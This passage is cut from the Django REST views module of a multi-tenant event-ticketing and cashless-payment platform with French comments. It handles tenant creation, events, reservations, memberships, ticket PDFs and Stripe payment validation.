c'est une auth avec APIKEY,\n # on vérifie avec notre propre moteur\n # Si l'user est rendu, la clé est valide\n user_api = user_apikey_valid(self)\n if user_api:\n permission_classes = []\n self.request.user = user_api\n\n elif self.action in ['list', 'retrieve']:\n permission_classes = [permissions.AllowAny]\n else:\n permission_classes = [TenantAdminPermission]\n\n return [permission() for permission in permission_classes]\n\n\ndef get_permission_Api_LR_Admin(self):\n user_api = user_apikey_valid(self)\n if user_api:\n permission_classes = []\n self.request.user = user_api\n\n elif self.action in ['list', 'retrieve']:\n permission_classes = [TenantAdminPermission]\n else:\n permission_classes = [permissions.AllowAny]\n return [permission() for permission in permission_classes]\n\n\nclass TarifBilletViewSet(viewsets.ViewSet):\n\n def list(self, request):\n queryset = Price.objects.all().order_by('prix')\n serializer = PriceSerializer(queryset, many=True, context={'request': request})\n return Response(serializer.data)\n\n def create(self, request):\n serializer = PriceSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n return get_permission_Api_LR_Any(self)\n\n\nclass ProductViewSet(viewsets.ViewSet):\n\n def list(self, request):\n serializer = ProductSerializer(\n Product.objects.all(),\n many=True, context={'request': request})\n return Response(serializer.data)\n\n def create(self, request):\n serializer = ProductSerializer(data=request.data)\n if serializer.is_valid():\n product = serializer.save()\n if getattr(serializer, 'img_img', None):\n product.img.save(serializer.img_name, serializer.img_img.fp)\n\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n for error in [serializer.errors[error][0] for error in serializer.errors]:\n if error.code == \"unique\":\n return Response(serializer.errors, status=status.HTTP_409_CONFLICT)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n return get_permission_Api_LR_Any(self)\n\n\nclass TenantViewSet(viewsets.ViewSet):\n\n def create(self, request):\n # Le slug est-il disponible ?\n try:\n slug = slugify(request.data.get('organisation'))\n Client.objects.get(schema_name=slug)\n logger.warning(f\"{slug} exist : Conflict\")\n return Response(\n {f\"{slug} existe déja : Conflit de nom\"},\n status=status.HTTP_409_CONFLICT)\n except Client.DoesNotExist:\n pass\n\n # L'url correspond bien à la catégorie choisie ?\n if not request.data.get('categorie'):\n raise serializers.ValidationError(_(\"categorie est obligatoire\"))\n categories = []\n if 'place' in request.get_full_path():\n categories = [Client.SALLE_SPECTACLE, Client.FESTIVAL]\n if 'artist' in request.get_full_path():\n categories = [Client.ARTISTE]\n\n if request.data.get('categorie') not in categories:\n raise serializers.ValidationError(_(\"categorie ne correspond pas à l'url\"))\n\n serializer = NewConfigSerializer(data=request.data, context={'request': request})\n\n # import ipdb; ipdb.set_trace()\n\n if serializer.is_valid():\n\n futur_conf = serializer.validated_data\n slug = slugify(futur_conf.get('organisation'))\n with schema_context('public'):\n try:\n tenant, created = Client.objects.get_or_create(\n schema_name=slug,\n name=futur_conf.get('organisation'),\n categorie=request.data.get('categorie'),\n )\n\n if not created:\n logger.error(f\"{futur_conf.get('organisation')} existe déja\")\n return Response(_(json.dumps(\n {\"uuid\": f\"{tenant.uuid}\", \"msg\": f\"{futur_conf.get('organisation')} existe déja\"})),\n status=status.HTTP_409_CONFLICT)\n\n domain, created = Domain.objects.get_or_create(\n domain=f\"{slug}.{os.getenv('DOMAIN')}\",\n tenant=tenant,\n is_primary=True\n )\n\n # Ajoute des cartes de test DEMO\n if settings.DEBUG and slug == \"demo\":\n management.call_command(\"load_cards\", \"--demo\")\n\n except IntegrityError as e:\n logger.error(e)\n return Response(_(f\"{e}\"), status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n logger.error(e)\n return Response(_(f\"{e}\"), status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n with tenant_context(tenant):\n rootConf = RootConfiguration.get_solo()\n conf = Configuration.get_solo()\n info_stripe = serializer.info_stripe\n\n serializer.update(instance=conf, validated_data=futur_conf)\n\n conf.slug = slug\n\n conf.email = info_stripe.email\n conf.site_web = info_stripe.business_profile.url\n conf.phone = info_stripe.business_profile.support_phone\n\n conf.stripe_mode_test = rootConf.stripe_mode_test\n\n if rootConf.stripe_mode_test:\n conf.stripe_connect_account_test = info_stripe.id\n else:\n conf.stripe_connect_account = info_stripe.id\n\n if getattr(serializer, 'img_img', None):\n conf.img.save(serializer.img_name, serializer.img_img.fp)\n if getattr(serializer, 'logo_img', None):\n conf.logo.save(serializer.logo_name, serializer.logo_img.fp)\n\n conf.save()\n conf.check_serveur_cashless()\n # user.client_admin.add(tenant)\n\n staff_group = Group.objects.get(name=\"staff\")\n\n user_from_email_nouveau_tenant = get_or_create_user(conf.email, force_mail=True)\n user_from_email_nouveau_tenant.client_admin.add(tenant)\n user_from_email_nouveau_tenant.is_staff = True\n user_from_email_nouveau_tenant.groups.add(staff_group)\n user_from_email_nouveau_tenant.save()\n\n place_serialized = ConfigurationSerializer(Configuration.get_solo(), context={'request': request})\n place_serialized_with_uuid = {'uuid': f\"{tenant.uuid}\"}\n place_serialized_with_uuid.update(place_serialized.data)\n\n return Response(place_serialized_with_uuid, status=status.HTTP_201_CREATED)\n\n logger.error(f\"serializer.errors : {serializer.errors}\")\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n # def update(self, request, pk=None):\n # tenant = get_object_or_404(Client, pk=pk)\n # user: TibilletUser = request.user\n # if tenant not in user.client_admin.all():\n # return Response(_(f\"Not Allowed\"), status=status.HTTP_405_METHOD_NOT_ALLOWED)\n # with tenant_context(tenant):\n # conf = Configuration.get_solo()\n # serializer = NewConfigSerializer(conf, data=request.data, partial=True)\n # if serializer.is_valid():\n # # serializer.save()\n # serializer.update(conf, serializer.validated_data)\n # return Response(serializer.data, status=status.HTTP_201_CREATED)\n #\n # return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def list(self, request):\n places_serialized_with_uuid = []\n configurations = []\n categories = []\n if 'place' in request.get_full_path():\n categories = [Client.SALLE_SPECTACLE, Client.FESTIVAL]\n if 'artist' in request.get_full_path():\n categories = [Client.ARTISTE]\n\n for tenant in Client.objects.filter(categorie__in=categories):\n with tenant_context(tenant):\n places_serialized_with_uuid.append({\"uuid\": f\"{tenant.uuid}\"})\n configurations.append(Configuration.get_solo())\n\n places_serialized = ConfigurationSerializer(configurations, context={'request': request}, many=True)\n\n for key, value in enumerate(places_serialized.data):\n places_serialized_with_uuid[key].update(value)\n\n return Response(places_serialized_with_uuid)\n\n def retrieve(self, request, pk=None):\n tenant = get_object_or_404(Client.objects.filter(categorie__in=['S', 'F']), pk=pk)\n with tenant_context(tenant):\n place_serialized = ConfigurationSerializer(Configuration.get_solo(), context={'request': request})\n place_serialized_with_uuid = {'uuid': f\"{tenant.uuid}\"}\n place_serialized_with_uuid.update(place_serialized.data)\n return Response(place_serialized_with_uuid)\n\n def get_permissions(self):\n if self.action == 'create':\n permission_classes = [permissions.IsAuthenticated]\n return [permission() for permission in permission_classes]\n else:\n return get_permission_Api_LR_Any(self)\n # permission_classes = [permissions.AllowAny]\n\n\nclass HereViewSet(viewsets.ViewSet):\n\n def list(self, request):\n config = Configuration.get_solo()\n place_serialized = ConfigurationSerializer(config, context={'request': request})\n\n dict_return = {'uuid': f\"{connection.tenant.uuid}\"}\n dict_return.update(place_serialized.data)\n\n products_adhesion = Product.objects.filter(\n categorie_article=Product.ADHESION,\n prices__isnull=False\n ).distinct()\n\n if len(products_adhesion) > 0:\n products_serializer = ProductSerializer(products_adhesion, many=True)\n dict_return['membership_products'] = products_serializer.data\n\n return Response(dict_return)\n\n def get_permissions(self):\n return get_permission_Api_LR_Any(self)\n\n\nclass EventsSlugViewSet(viewsets.ViewSet):\n def retrieve(self, request, pk=None):\n queryset = Event.objects.all().order_by('-datetime')\n event = get_object_or_404(queryset, slug=pk)\n serializer = EventSerializer(event)\n return Response(serializer.data)\n\n def get_permissions(self):\n return get_permission_Api_LR_Any(self)\n\n\nclass EventsViewSet(viewsets.ViewSet):\n\n def list(self, request):\n tenant: Client = connection.tenant\n four_hour_before_now = datetime.now().date() - timedelta(hours=4)\n\n production_places = [Client.SALLE_SPECTACLE, Client.FESTIVAL]\n if tenant.categorie in production_places:\n queryset = Event.objects.filter(datetime__gte=four_hour_before_now).order_by('datetime')\n events_serialized = EventSerializer(queryset, many=True, context={'request': request})\n return Response(events_serialized.data)\n\n elif tenant.categorie == Client.ARTISTE:\n artist = tenant\n directory = {}\n events_serialized_data = []\n with schema_context('public'):\n events_from_public_directory = EventDirectory.objects.filter(\n datetime__gte=four_hour_before_now,\n artist=artist\n )\n for event in events_from_public_directory:\n if directory.get(event.place):\n directory[event.place].append(event.event_uuid)\n else:\n directory[event.place] = []\n directory[event.place].append(event.event_uuid)\n\n for place in directory:\n with tenant_context(place):\n queryset = Event.objects.filter(uuid__in=directory[place])\n events_serialized = EventSerializer(queryset, many=True, context={'request': request})\n for data in events_serialized.data:\n events_serialized_data.append(data)\n\n return Response(events_serialized_data)\n\n elif tenant.categorie == Client.META:\n events_serialized_data = []\n tenants = Client.objects.filter(categorie=Client.SALLE_SPECTACLE)\n for other_tenant in tenants:\n with tenant_context(other_tenant):\n queryset = Event.objects.filter(datetime__gte=four_hour_before_now).order_by('datetime')\n events_serialized = EventSerializer(queryset, many=True, context={'request': request})\n for data in events_serialized.data:\n events_serialized_data.append(data)\n return Response(events_serialized_data)\n\n def retrieve(self, request, pk=None):\n queryset = Event.objects.all().order_by('-datetime')\n event = get_object_or_404(queryset, pk=pk)\n serializer = EventSerializer(event)\n return Response(serializer.data)\n\n def create(self, request):\n serializer_create = EventCreateSerializer(data=request.data)\n if serializer_create.is_valid():\n # import ipdb; ipdb.set_trace()\n event: Event = serializer_create.validated_data\n serializer = EventSerializer(event)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n logger.error(f\"EventsViewSet : {serializer_create.errors}\")\n return Response(serializer_create.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def update(self, request, pk=None):\n queryset = Event.objects.all().order_by('-datetime')\n event = get_object_or_404(queryset, pk=pk)\n serializer = EventSerializer(event, data=request.data, partial=True)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def destroy(self, request, pk=None):\n queryset = Event.objects.all().order_by('-datetime')\n event = get_object_or_404(queryset, pk=pk)\n event.delete()\n return Response(('deleted'), status=status.HTTP_200_OK)\n\n def get_permissions(self):\n return get_permission_Api_LR_Any(self)\n\n\nclass DetailCashlessCards(viewsets.ViewSet):\n def create(self, request):\n validator = DetailCashlessCardsValidator(data=request.data, context={'request': request})\n if validator.is_valid():\n with schema_context('public'):\n logger.info('Detail valide')\n detailC = validator.save()\n serializer = DetailCashlessCardsSerializer(detailC)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n return Response(validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n permission_classes = [RootPermission]\n return [permission() for permission in permission_classes]\n\n\nclass Loadcardsfromdict(viewsets.ViewSet):\n def create(self, request):\n # logger.info(request.data)\n\n validator = CashlessCardsValidator(data=request.data, many=True)\n if validator.is_valid():\n prems = validator.data[0]\n detail = Detail.objects.get(uuid=prems.get('detail'))\n for carte in validator.data:\n part = carte.get('url').partition('/qr/')\n base_url = f\"{part[0]}{part[1]}\"\n uuid_qrcode = uuid.UUID(part[2], version=4)\n if detail.uuid == uuid.UUID(carte.get('detail'), version=4) and base_url == detail.base_url:\n try:\n carte, created = CarteCashless.objects.get_or_create(\n tag_id=carte['tag_id'],\n uuid=uuid_qrcode,\n number=carte['number'],\n detail=detail,\n )\n logger.info(f\"{created}: {carte}\")\n\n except Exception as e:\n logger.error(e)\n Response(_(f\"Erreur d'importation {e}\"),\n status=status.HTTP_406_NOT_ACCEPTABLE)\n else:\n Response(_(f\"Erreur d'importation : Detail ne correspond pas\"),\n status=status.HTTP_406_NOT_ACCEPTABLE)\n\n return Response(\"poulpe\", status=status.HTTP_200_OK)\n\n return Response(validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n permission_classes = [RootPermission]\n return [permission() for permission in permission_classes]\n\n\nclass ChargeCashless(viewsets.ViewSet):\n def create(self, request):\n configuration = Configuration.get_solo()\n if not configuration.key_cashless or not configuration.server_cashless:\n return Response(_(\"Serveur cashless non présent dans configuration\"),\n status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n try:\n response = requests.request(\"GET\",\n f\"{configuration.server_cashless}/api/checkcarteqruuid/{request.data.get('uuid')}/\",\n headers={\"Authorization\": f\"Api-Key {configuration.key_cashless}\"},\n )\n\n if response.status_code != 200:\n return Response(_(f\"Requete non comprise : {response.status_code}\"),\n status=status.HTTP_405_METHOD_NOT_ALLOWED)\n except Exception as e:\n return Response(_(f\"Serveur cashless ne répond pas : {e}\"), status=status.HTTP_408_REQUEST_TIMEOUT)\n\n validator = ChargeCashlessValidator(data=request.data, context={'request': request})\n if validator.is_valid():\n # serializer.save()\n return Response(validator.data, status=status.HTTP_201_CREATED)\n return Response(validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n permission_classes = [permissions.IsAuthenticated]\n return [permission() for permission in permission_classes]\n\n\nclass ReservationViewset(viewsets.ViewSet):\n def list(self, request):\n queryset = Reservation.objects.all().order_by('-datetime')\n serializer = ReservationSerializer(queryset, many=True, context={'request': request})\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Reservation.objects.all().order_by('-datetime')\n resa = get_object_or_404(queryset, pk=pk)\n serializer = ReservationSerializer(resa)\n return Response(serializer.data)\n\n def create(self, request):\n # import ipdb; ipdb.set_trace()\n logger.info(f\"ReservationViewset CREATE : {request.data}\")\n\n validator = ReservationValidator(data=request.data, context={'request': request})\n if validator.is_valid():\n return Response(validator.data, status=status.HTTP_201_CREATED)\n\n logger.error(f\"ReservationViewset CREATE ERROR : {validator.errors}\")\n return Response(validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n return get_permission_Api_LR_Admin(self)\n\n\nclass OptionTicket(viewsets.ViewSet):\n def list(self, request):\n queryset = OptionGenerale.objects.all()\n serializer = OptionsSerializer(queryset, many=True, context={'request': request})\n return Response(serializer.data)\n\n def create(self, request):\n validator = OptionsSerializer(data=request.data, context={'request': request})\n if validator.is_valid():\n validator.save()\n return Response(validator.data, status=status.HTTP_201_CREATED)\n else:\n for error in [validator.errors[error][0] for error in validator.errors]:\n if error.code == \"unique\":\n return Response(validator.errors, status=status.HTTP_409_CONFLICT)\n return Response(validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n return get_permission_Api_LR_Any(self)\n\n\ndef borne_temps_4h():\n now = timezone.now()\n jour = now.date()\n tzlocal = pytz.timezone(Configuration.get_solo().fuseau_horaire)\n debut_jour = tzlocal.localize(datetime.combine(jour, datetime.min.time()), is_dst=None) + timedelta(\n hours=4)\n lendemain_quatre_heure = tzlocal.localize(datetime.combine(jour, datetime.max.time()), is_dst=None) + timedelta(\n hours=4)\n\n if now < debut_jour:\n # Alors on demande au petit matin.\n # Les bornes sont ceux de la veille.\n return debut_jour - timedelta(days=1), debut_jour\n else:\n return debut_jour, lendemain_quatre_heure\n\n\n'''\n@permission_classes([permissions.IsAuthenticated])\nclass LoadCardsFromCsv(APIView):\n\n def is_string_an_url(self, url_string):\n validate_url = URLValidator()\n\n try:\n validate_url(url_string)\n except ValidationError as e:\n return False\n return True\n\n def post(self, request):\n try :\n gen = request.data['generation']\n content_csv_file = request.data['csv'].read().decode()\n file = StringIO(content_csv_file)\n csv_data = csv.reader(file, delimiter=\",\")\n except:\n return Response('Mauvais fichiers', status=status.HTTP_406_NOT_ACCEPTABLE)\n\n list_csv = []\n for line in csv_data:\n list_csv.append(line)\n\n # on saucissonne l'url d'une ligne au pif :\n part = list_csv[1][0].partition('/qr/')\n base_url = f\"{part[0]}{part[1]}\"\n\n if self.is_string_an_url(base_url) and uuid.UUID(part[2]) :\n detail_carte, created = Detail.objects.get_or_create(\n base_url=base_url,\n origine=connection.tenant,\n generation=int(gen),\n )\n\n numline = 1\n for line in list_csv:\n print(numline)\n part = line[0].partition('/qr/')\n try:\n uuid_url = uuid.UUID(part[2])\n print(f\"base_url : {base_url}\")\n print(f\"uuid_url : {uuid_url}\")\n print(f\"number : {line[1]}\")\n print(f\"tag_id : {line[2]}\")\n\n # if str(uuid_url).partition('-')[0].upper() != line[1]:\n # print('ERROR PRINT != uuid')\n # break\n\n carte, created = CarteCashless.objects.get_or_create(\n tag_id=line[2],\n uuid=uuid_url,\n number=line[1],\n detail=detail_carte,\n )\n\n numline += 1\n except:\n pass\n\n return Response('Cartes chargées', status=status.HTTP_200_OK)\n\n return Response('Mauvais formatage de fichier.', status=status.HTTP_406_NOT_ACCEPTABLE)\n # import ipdb; ipdb.set_trace()\n'''\n\n\n@permission_classes([permissions.IsAuthenticated])\nclass CancelSubscription(APIView):\n def post(self, request):\n user = request.user\n price = request.data.get('uuid_price')\n\n membership = Membership.objects.get(\n user=user,\n price=price\n )\n\n if membership.status == Membership.AUTO:\n stripe.api_key = Configuration.get_solo().get_stripe_api()\n stripe.Subscription.delete(\n membership.stripe_id_subscription,\n # stripe_account=config.get_stripe_connect_account(),\n )\n membership.status = Membership.CANCELED\n membership.save()\n\n # TODO: envoyer un mail de confirmation d'annulation\n return Response('Renouvellement automatique supprimé.', status=status.HTTP_200_OK)\n\n return Response('Pas de renouvellement automatique sur cette adhésion.', status=status.HTTP_406_NOT_ACCEPTABLE)\n\n\n@permission_classes([TenantAdminPermission])\nclass Gauge(APIView):\n\n # API pour avoir l'état de la jauge (GAUGE in inglishe) et des billets scannés.\n def get(self, request):\n config = Configuration.get_solo()\n debut_jour, lendemain_quatre_heure = borne_temps_4h()\n queryset = Ticket.objects.filter(\n reservation__event__datetime__gte=debut_jour,\n reservation__event__datetime__lte=lendemain_quatre_heure,\n status__in=[Ticket.NOT_SCANNED, Ticket.SCANNED]\n )\n\n data = {\n \"gauge_max\": config.jauge_max,\n \"all_tickets\": queryset.count(),\n \"scanned_tickets\": queryset.filter(status=Ticket.SCANNED).count()\n }\n\n return Response(data, status=status.HTTP_200_OK)\n\n\nclass TicketViewset(viewsets.ViewSet):\n def list(self, request):\n debut_jour, lendemain_quatre_heure = borne_temps_4h()\n\n queryset = Ticket.objects.filter(\n reservation__event__datetime__gte=debut_jour,\n reservation__event__datetime__lte=lendemain_quatre_heure,\n status__in=[\"K\", \"S\"]\n )\n\n serializer = TicketSerializer(queryset, many=True, context={'request': request})\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Ticket.objects.all()\n ticket = get_object_or_404(queryset, pk=pk)\n serializer = TicketSerializer(ticket)\n return Response(serializer.data)\n\n def get_permissions(self):\n return get_permission_Api_LR_Admin(self)\n\n\ndef maj_membership_from_cashless(user: TibilletUser, data: dict):\n '''\n On met à jour la carte de membre si le cashless à des données plus récentes.\n\n '''\n logger.info('maj_membership_from_cashless')\n try:\n # Il n'y est sensé y avoir qu'un seul objet produit qui puisse être envoyé au cashless\n produit_adhesion = Product.objects.get(send_to_cashless=True)\n\n # On va chercher la carte membership\n deadline_billetterie = None\n membership = Membership.objects.filter(\n user=user,\n price__product=produit_adhesion\n ).first()\n\n if membership:\n deadline_billetterie = membership.deadline()\n else:\n prices_adhesion = produit_adhesion.prices.all()\n price: Price = prices_adhesion.get(prix=float(data.get('cotisation')))\n logger.info(f'Pas de membreship, on la crée avec la data du cashless :')\n logger.info(f'{data}')\n membership = Membership.objects.create(\n user=user,\n first_name=data.get('prenom'),\n last_name=data.get('name'),\n newsletter=bool(data.get('demarchage')),\n price=price\n )\n\n date_inscription = data.get('date_inscription')\n if date_inscription:\n deadline_cashless = datetime.strptime(data.get('prochaine_echeance'), '%Y-%m-%d').date()\n if deadline_billetterie:\n if deadline_billetterie >= deadline_cashless:\n logger.info('Adhésion associative syncho avec le cashless.')\n return membership\n\n logger.info(f'Adhésion associative {produit_adhesion} non syncho avec le cashless. On mets à jour.')\n\n membership.date_added = dateutil.parser.parse(data.get('date_ajout'))\n membership.first_contribution = datetime.strptime(data.get('date_inscription'), '%Y-%m-%d').date()\n membership.last_contribution = datetime.strptime(data.get('date_derniere_cotisation'), '%Y-%m-%d').date()\n membership.contribution_value = float(data.get('cotisation'))\n membership.save()\n\n return membership\n\n except Exception as e:\n logger.error(f'maj_membership_from_cashless ERROR : {e}')\n return None\n\n\ndef request_for_data_cashless(user: TibilletUser):\n if user.email_error or not user.email:\n return {'erreur': f\"user.email_error {user.email_error}\"}\n\n configuration = Configuration.get_solo()\n if configuration.server_cashless and configuration.key_cashless:\n try:\n verify = True\n if settings.DEBUG:\n verify = False\n\n response = requests.request(\"POST\",\n f\"{configuration.server_cashless}/api/membre_check\",\n headers={\"Authorization\": f\"Api-Key {configuration.key_cashless}\"},\n data={\"email\": user.email},\n verify=verify)\n\n if response.status_code != 200:\n return {'erreur': f\"{response.status_code} : {response.text}\"}\n\n data = json.loads(response.content)\n if data.get('a_jour_cotisation'):\n membership = maj_membership_from_cashless(user, data)\n return data\n\n except Exception as e:\n return {'erreur': f\"{e}\"}\n\n return {'erreur': f\"pas de configuration server_cashless\"}\n\n\nclass MembershipViewset(viewsets.ViewSet):\n\n def create(self, request):\n logger.info(f\"MembershipViewset reçue -> go MembreValidator\")\n\n # Test pour option :\n # request.data['options'] = ['1ff89201-edfa-4839-80d8-a5f98737f970',]\n\n # TODO: Pourquoi deux serializers ?\n membre_validator = MembreValidator(data=request.data, context={'request': request})\n if membre_validator.is_valid():\n adhesion_validator = NewAdhesionValidator(data=request.data, context={'request': request})\n if adhesion_validator.is_valid():\n return Response(adhesion_validator.data, status=status.HTTP_201_CREATED)\n\n logger.error(f'adhesion_validator.errors : {adhesion_validator.errors}')\n return Response(adhesion_validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n logger.error(f'membre_validator.errors : {membre_validator.errors}')\n return Response(membre_validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n def get_permissions(self):\n if self.action in ['create', 'retrieve']:\n permission_classes = [permissions.AllowAny]\n else:\n permission_classes = [TenantAdminPermission]\n\n return [permission() for permission in permission_classes]\n\n\n\nclass ZReportPDF(View):\n def get(self, request, pk_uuid):\n logger.info(f\"ZReportPDF user : {request.user}\")\n if not TenantAdminPermissionWithRequest(request):\n return HttpResponse(f\"403\", content_type='application/json')\n\n configuration = Configuration.get_solo()\n if configuration.server_cashless and configuration.key_cashless:\n try:\n response = requests.request(\"GET\",\n f\"{configuration.server_cashless}/rapport/TicketZapi/{pk_uuid}\",\n headers={\"Authorization\": f\"Api-Key {configuration.key_cashless}\"},\n verify=bool(not settings.DEBUG), )\n\n if response.status_code == 200:\n data = json.loads(response.content)\n\n date = data['start_date']\n structure = data['structure']\n # import ipdb; ipdb.set_trace()\n\n logger.info(f\"ZReportPDF data : {data}\")\n logger.info(f\" On envoie le mail\")\n report_celery_mailer.delay([data, ])\n\n pdf_binary = report_to_pdf(data)\n response = HttpResponse(pdf_binary, content_type='application/pdf')\n response['Content-Disposition'] = f'attachment; filename=\"{structure}-TicketZ-{date}.pdf\"'\n return response\n\n # return HttpResponse(json.dumps(data), content_type='application/json')\n # return Response(data, status=status.HTTP_200_OK)\n\n except Exception as e:\n logger.info(f\"ZReportPDF erreur {e}\")\n raise e\n\n logger.info(f\"ZReportPDF erreur {response.status_code} : {response.text}\")\n return HttpResponse(f\"{response.status_code}\", content_type='application/json')\n\n # return {'erreur': f\"pas de configuration server_cashless\"}\n\n\nclass TicketPdf(APIView):\n permission_classes = [AllowAny]\n\n def get(self, request, pk_uuid):\n ticket = get_object_or_404(Ticket, uuid=pk_uuid)\n\n VALID_TICKET_FOR_PDF = [Ticket.NOT_SCANNED, Ticket.SCANNED]\n if ticket.status not in VALID_TICKET_FOR_PDF:\n return Response('Ticket non valide', status=status.HTTP_403_FORBIDDEN)\n\n pdf_binary = create_ticket_pdf(ticket)\n response = HttpResponse(pdf_binary, content_type='application/pdf')\n response['Content-Disposition'] = f'attachment; filename=\"{ticket.pdf_filename()}\"'\n return response\n\n\n\n\n# On vérifie que les métatada soient les meme dans la DB et chez Stripe.\ndef metatadata_valid(paiement_stripe_db: Paiement_stripe, checkout_session):\n metadata_stripe_json = checkout_session.metadata\n metadata_stripe = json.loads(str(metadata_stripe_json))\n\n metadata_db_json = paiement_stripe_db.metadata_stripe\n metadata_db = json.loads(metadata_db_json)\n\n try:\n assert metadata_stripe == metadata_db\n assert set(metadata_db.keys()) == set(metadata_stripe.keys())\n for key in set(metadata_stripe.keys()):\n assert metadata_db[key] == metadata_stripe[key]\n return True\n except:\n logger.error(f\"{timezone.now()} \"\n f\"retour_stripe {paiement_stripe_db.uuid} : \"\n f\"metadata ne correspondent pas : {metadata_stripe} {metadata_db}\")\n return False\n\n\ndef paiment_stripe_validator(request, paiement_stripe):\n if paiement_stripe.traitement_en_cours:\n\n data = {\n \"msg\": 'Paiement validé. Création des billets et envoi par mail en cours.',\n }\n\n if paiement_stripe.reservation:\n serializer = TicketSerializer(paiement_stripe.reservation.tickets.all().exclude(status=Ticket.SCANNED),\n many=True)\n data[\"tickets\"] = serializer.data\n\n # Si ce n'est pas une adhésion par QRCode,\n # on renvoie vers le front en annonçant que le travail est en cours\n if paiement_stripe.source != Paiement_stripe.QRCODE:\n return Response(\n data,\n status=status.HTTP_226_IM_USED\n )\n\n if paiement_stripe.reservation:\n if paiement_stripe.reservation.status == Reservation.PAID_ERROR:\n return Response(\n _(\"Erreur dans l'envoi du mail. Merci de vérifier l'adresse\"),\n status=status.HTTP_412_PRECONDITION_FAILED\n )\n\n if paiement_stripe.status == Paiement_stripe.VALID or paiement_stripe.reservation.status == Reservation.VALID:\n serializer = TicketSerializer(paiement_stripe.reservation.tickets.filter(status=Ticket.NOT_SCANNED),\n many=True, context=request)\n\n data = {\n \"msg\": 'Paiement validé. Billets envoyés par mail.',\n \"tickets\": serializer.data,\n }\n\n return Response(\n data,\n status=status.HTTP_208_ALREADY_REPORTED\n )\n\n # configuration = Configuration.get_solo()\n # stripe.api_key = RootConfiguration.get_solo().get_stripe_api()\n stripe.api_key = Configuration.get_solo().get_stripe_api()\n\n # SI c'est une source depuis INVOICE,\n # L'object vient d'être créé, on vérifie que la facture stripe\n # est payée et on met en VALID.\n if paiement_stripe.source == Paiement_stripe.INVOICE:\n paiement_stripe.traitement_en_cours = True\n invoice = stripe.Invoice.retrieve(paiement_stripe.invoice_stripe)\n\n if invoice.status == 'paid':\n paiement_stripe.status = Paiement_stripe.PAID\n paiement_stripe.last_action = timezone.now()\n paiement_stripe.traitement_en_cours = True\n paiement_stripe.save()\n\n return Response(\n 'invoice ok',\n status=status.HTTP_202_ACCEPTED\n )\n\n else:\n return Response(\n _(f'stripe invoice : {invoice.status} - paiement : {paiement_stripe.status}'),\n status=status.HTTP_402_PAYMENT_REQUIRED\n )\n\n # Sinon c'est un paiement stripe checkout\n elif paiement_stripe.status != Paiement_stripe.VALID:\n config = Configuration.get_solo()\n checkout_session = stripe.checkout.Session.retrieve(\n paiement_stripe.checkout_session_id_stripe,\n # stripe_account=config.get_stripe_connect_account()\n )\n\n paiement_stripe.customer_stripe = checkout_session.customer\n\n # Vérifie que les metatada soient cohérentes. #NTUI !\n if metatadata_valid(paiement_stripe, checkout_session):\n if checkout_session.payment_status == \"unpaid\":\n paiement_stripe.status = Paiement_stripe.PENDING\n if datetime.now().timestamp() > checkout_session.expires_at:\n paiement_stripe.status = Paiement_stripe.EXPIRE\n\n paiement_stripe.save()\n\n if paiement_stripe.source != Paiement_stripe.QRCODE:\n return Response(\n _(f'stripe : {checkout_session.payment_status} - paiement : {paiement_stripe.status}'),\n status=status.HTTP_402_PAYMENT_REQUIRED\n )\n\n elif checkout_session.payment_status == \"paid\":\n\n # le .save() lance le process pre_save BaseBillet.models.send_to_cashless\n # qui modifie le status de chaque ligne\n # et envoie les informations au serveur cashless.\n # si validé par le serveur cashless, alors la ligne sera VALID.\n # Si toute les lignes sont VALID, le paiement_stripe sera aussi VALID\n # grace au post_save BaseBillet.models.check_status_stripe\n\n paiement_stripe.status = Paiement_stripe.PAID\n paiement_stripe.last_action = timezone.now()\n paiement_stripe.traitement_en_cours = True\n\n # Dans le cas d'un nouvel abonnement\n # On va chercher le numéro de l'abonnement stripe\n # Et sa facture\n if checkout_session.mode == 'subscription':\n if bool(checkout_session.subscription):\n paiement_stripe.subscription = checkout_session.subscription\n subscription = stripe.Subscription.retrieve(\n checkout_session.subscription,\n # stripe_account=config.get_stripe_connect_account()\n )\n paiement_stripe.invoice_stripe = subscription.latest_invoice\n\n paiement_stripe.save()\n logger.info(\"*\" * 30)\n logger.info(\n f\"{datetime.now()} - paiment_stripe_validator - checkout_session.payment_status : {checkout_session.payment_status}\")\n logger.info(\n f\"{datetime.now()} - paiment_stripe_validator - paiement_stripe.save() {paiement_stripe.status}\")\n logger.info(\"*\" * 30)\n\n else:\n paiement_stripe.status = Paiement_stripe.CANCELED\n paiement_stripe.save()\n else:\n return Response(_(f'Erreur Meta'), status=status.HTTP_406_NOT_ACCEPTABLE)\n\n # on vérifie le changement de status\n paiement_stripe.refresh_from_db()\n\n # Paiement depuis QRCode carte\n # on envoie au serveur cashless\n if paiement_stripe.source == Paiement_stripe.QRCODE:\n # Si le paiement est valide, c'est que les presave et postsave\n # ont validé la réponse du serveur cashless pour les recharges\n if paiement_stripe.status == Paiement_stripe.VALID:\n lignes_articles = paiement_stripe.lignearticle_set.all()\n # on boucle ici pour récuperer 